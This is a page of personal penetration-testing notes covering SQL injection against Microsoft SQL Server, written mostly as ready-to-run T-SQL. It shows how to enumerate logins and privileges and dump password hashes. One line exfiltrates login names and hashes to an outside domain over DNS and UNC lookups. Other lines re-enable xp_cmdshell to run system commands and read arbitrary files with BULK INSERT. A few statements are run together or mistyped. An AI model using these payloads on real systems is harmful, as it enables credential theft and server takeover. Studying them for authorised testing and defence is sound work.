📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Database commands
  • Comments
  • Version
  • Users
  • Privileges
  • Database info
  • List tables
  • List columns
  • Filter table by column name
  • Access nth row
  • String operations
  • Control flow
  • Time delay
  • DNS and HTTP
  • Passwords
  • Vulnerabilities
  • RCE
  • Arbitrary file access
  1. Web Attacks
  2. SQL injection

MSSQL

Database commands

Comments

SELECT 1 -- comment
SELECT /*comment*/1

Version

SELECT @@version

Users

SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
SELECT name FROM master..syslogins
EXEC sp_addlogin '<username>', '<password>'; -- priv
EXEC sp_droplogin '<username>'; -- priv
EXEC master.dbo.sp_addsrvrolemember '<username>', 'sysadmin'; -- priv
SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('sysadmin', '<usrername>');
SELECT name FROM master..syslogins WHERE sysadmin = '1'

Privileges

SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE’);
SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); 
SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); 
SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
--who has it?--
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;
--check if current user has privilege--
SELECT is_srvrolemember(‘sysadmin’);
SELECT is_srvrolemember(‘dbcreator’);
SELECT is_srvrolemember(‘bulkadmin’);
SELECT is_srvrolemember(‘diskadmin’);
SELECT is_srvrolemember(‘processadmin’);
SELECT is_srvrolemember(‘serveradmin’);
SELECT is_srvrolemember(‘setupadmin’);
SELECT is_srvrolemember(‘securityadmin’);

Database info

SELECT DB_NAME()
SELECT name FROM master..sysdatabases;
EXEC sp_helpdb master; --location of master.mdf
EXEC sp_helpdb pubs; --location of pubs.mdf

Default tables

northwind
model
msdb
pubs -- not on sql server 2005
tempdb

List tables

SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- tables
SELECT name FROM master..sysobjects WHERE xtype = 'V'; -- views
SELECT name FROM <db name>..sysobjects WHERE xtype = 'U';

List columns

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<table>'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='<table>';

Filter table by column name

SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%<query>%';;

Access nth row

SELECT TOP 1 name FROM (SELECT TOP <nth> name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC;

String operations

substring('<str>', <start>, <end>) 
SELECT 6 & 2
SELECT char(0×41)    --'A'
SELECT ascii('A')    --41
Casting	SELECT CAST('1' as int);
SELECT CAST(1 as char)
SELECT 'A' + 'B'            --'AB'
SELECT char(65)+char(66)    --'AB'

Control flow

IF (1=1) SELECT 1 ELSE SELECT 2 
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1

Time delay

WAITFOR DELAY '0:0:5' -- pause for 5 seconds

DNS and HTTP

SELECT HOST_NAME();
declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails "\' + @host + 'c$boot.ini"'); -- nonpriv, works on 2000declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.<URL>' from sys.sql_logins; exec('xp_fileexist "\' + @host + 'c$boot.ini"');

Passwords

SELECT name, password FROM master..sysxlogins;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins ;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;

Format: SHA1-based

Vulnerabilities

RCE

EXEC xp_cmdshell '<command>';

To reactivate the console in case the command fails:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE; 
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Arbitrary file access

CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM '<path to file>';
DROP TABLE mydata;
PreviousOracleNextMySQL

Last updated 1 year ago